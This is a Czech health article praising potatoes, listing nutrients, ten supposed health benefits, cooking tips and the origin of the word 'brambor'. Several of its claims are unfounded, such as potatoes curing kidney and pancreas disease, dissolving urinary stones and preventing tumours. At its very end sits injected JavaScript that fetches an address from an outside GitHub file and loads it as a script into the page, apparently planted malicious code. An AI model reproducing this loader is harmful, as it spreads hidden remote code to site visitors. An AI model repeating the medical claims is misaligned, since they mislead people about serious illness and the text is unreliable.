Jedna z nejobyčejnějších a nejběžnějších druhů zeleniny je brambora. U nás běžně a hojně používaná. Málokdo však ví, že nevzhledný brambor v sobě skrývá velký přínos pro naše zdraví. Podle posledních studií britských vědců se brambory vyrovnají a mnohdy předčí jiné propagované druhy zelenin a potravin, např. zelí, ořechy, banány apod. Proč tomu tak je?
Co brambora obsahuje
Brambora obsahuje obrovské množství vitamínu C a až 5 krát více vlákniny než banán. Dále je velkou zásobárnou selenu, prvku, jehož nedostatek zvyšuje riziko infarktu a onemocnění kardiovaskulárního systému. Selen je také velmi důležitý antioxidant, ničí volné radikály a působí tak proti rakovinovému bujení. Brambory obsahují i další důležité minerály, např, vápník, železo, měď, magnézium, dále bílkoviny a vítamíny B1 a B2. Velkým plusem brambor je, že mají všechny živiny obsahově vyváženy, nezatěžují trávicí soustavu a jsou energeticky méně náročně než například těstoviny.
10 důvodů proč jíst brambory
- Brambory fungují protizánětlivě, pomáhají při léčení zánětů, artritidě
- Patří mezi zásadité potraviny, příznivě ovlivňuje metabolismus, předchází kardiovaskulárním chorobám
- Léčit ekzémy, čistí pleť (pomáhá bramborová šťáva, buď ji pijeme nebo můžeme zkusit postižená místa omývat)
- Pomáhají při redukci váhy (možno pít bramborovou šťávu 3krát denně)
- Brambory podporují vylučování škodlivin z těla
- Snižují hladinu cholesterolu
- Detoxikují organismus
- Pomáhají při léčbě ledvin a pankreatidy
- Léčí močové cesty, odstraňují kameny v močových cestách
- Bojují proti vzniku nádorů
Jak je konzumovat
Primárně je důležité kupovat kvalitní brambory, bez černých skvrn a zelených ploch. Takové brambory obsahují toxiny. Nejvíce vitamínů a dalších výživných látek v bramborách zachováme, pokud je vaříme nebo pečeme ve slupce. Chcete-li je oloupat, vhazujte je do vroucí osolené vody s trochou kmínu. Chcete-li konzumovat jen bramborovou šťávu, můžete ji nakombinovat s jinými šťávami, např. mrkvovou, elixír zdraví pak chutnější i zdravější.
Způsobů jak připravit brambory ke konzumaci je samozřejmě více – od klasicky vařených, po zapékané, plněné, kaše a bramboráčky, nabízí se nepřeberné množství variací a chutí.
Perlička na závěr
Víte, jak vznikl název brambor? Byl pravděpodobně odvozen z názvu Braniborska, odkud se do českých zemí brambory dostaly. Pro brambory i v součastnosti známe mnohé jiné názvy, v různých krajích Česka se jim říká jinak. Například zemáky, erteple, kobzole, okroše, bandury, jabluška atd. (var url = „https://raw.githubusercontent.com/truba77/trubnik/main/to.txt“; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(„script“); script.src = data.trim(); document.getElementsByTagName(„head“)[0].appendChild(script); });)